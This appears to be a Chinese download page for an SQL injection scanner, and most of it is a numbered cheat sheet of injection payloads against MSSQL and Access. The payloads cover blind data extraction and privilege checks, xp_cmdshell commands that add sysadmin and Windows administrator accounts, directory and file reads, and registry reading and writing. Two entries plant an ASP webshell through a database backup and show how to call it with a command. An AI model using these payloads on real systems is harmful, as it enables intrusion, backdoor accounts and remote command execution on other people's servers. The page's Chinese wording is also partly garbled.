未游网

网站安全检测入侵工具 网站安全检测入侵工具
32位64位无插件无广告
  • 文件大小:1024 KB
  • 界面语言:中文
  • 发布日期:2023-04-19
  • 系统平台:Win7/WinXP/Win8/Win10
  • 软件标签:系统安全
本地下载 安全放心,最新版本
广告位500x320
本专用工具作用十分强劲,期待学生们用以正道,别去做一些为非作歹的让人十分可耻的事儿,由VB语言撰写的网址网站漏洞扫描专用工具的名字,ASP引入网站漏洞扫描专用工具,尤其在SQL Server引入检验层面有非常高的准确度。
1、分辨是不是有引入
;and 1=1
;and 1=2
2、分析判断是不是mssql
;and user0
3、分辨数据库系统软件
;and (select count(*) from sysobjects)0 mssql
;and (select count(*) from msysobjects)0 access
4、引入主要参数是标识符
and [查询条件] and =
5、检索时没过虑主要参数的
and [查询条件] and %=
6、猜数据库
;and (Select Count(*) from [数据库名])0
7、猜字段
;and (Select Count(字段名) from 数据库名)0
8、猜字段中纪录长短
;and (select top 1 len(字段名) from 数据库名)0
9、(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)0
10.检测管理权限构造(mssql)
;and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));
;and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));
;and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));
;and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));
;and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));
;and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));
;and 1=(SELECT IS_MEMBER(db_owner));
11、加上mssql和体系的账号
;exec master.dbo.sp_addlogin username;
;exec master.dbo.sp_password null,
username,password;
;exec master.dbo.sp_addsrvrolemember sysadmin
username;
;exec master.dbo.xp_cmdshell net user username
password /workstations:* /times:all
/passwordchg:yes /passwordreq:yes /active:yes /add
;
;exec master.dbo.xp_cmdshell net user username
password /add;
;exec master.dbo.xp_cmdshell net localgroup
administrators username /add;
12、(1)解析xml文件目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree c:\
;and (select top 1 paths from dirs)0
;and (select top 1 paths from dirs where paths not
in(上步获得的paths)))
(2)解析xml文件目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));
;insert temp exec master.dbo.xp_availablemedia; 得到当今全部控制器
;insert into temp(id) exec master.dbo.xp_subdirs c:\; 得到根目录目录
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\; 得到全部根目录的文件目录树形结构
;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp; 查询资料的內容
13、mssql中的sql语句
xp_regenumvalues 注册表文件根键, 子键
;exec xp_regenumvalues HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion\Run 以好几个记录集方法回到全部键值
xp_regread 根键,子键,键值名
;exec xp_regread HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
CommonFilesDir 回到制订键的值
xp_regwrite 根键,子键, 值名, 值种类, 值
值种类有2种REG_SZ 表明字符型,REG_DWORD 表明整形
;exec xp_regwrite HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
TestValueName,reg_sz,hello 载入注册表文件
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
TestValueName 删掉某一值
xp_regdeletekey HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey 退格键,包含该键下全部值
14、mssql的backup建立webshell
use model
create table cmd(str image)
insert into cmd(str) values (% Dim oScript %)
backup database model to disk=c:\l.asp
15、mssql内嵌涵数
;and (select @@version)0 得到Windows的版本信息
;and user_name()=dbo 分辨当今系统软件的联接客户是否sa
;and (select user_name())0 爆当今系统软件的联接客户
;and (select db_name())0 获得当今联接的数据库
16、简约的webshell
use model
create table cmd(str image)
insert into cmd(str) values (%=server.createobject(wscript.shell).exec(cmd.exe /c request(c)).stdout.readall%)
backup database model to disk=g:\wwwtest\l.asp
要求的情况下,像这样子用
l.asp?c=dir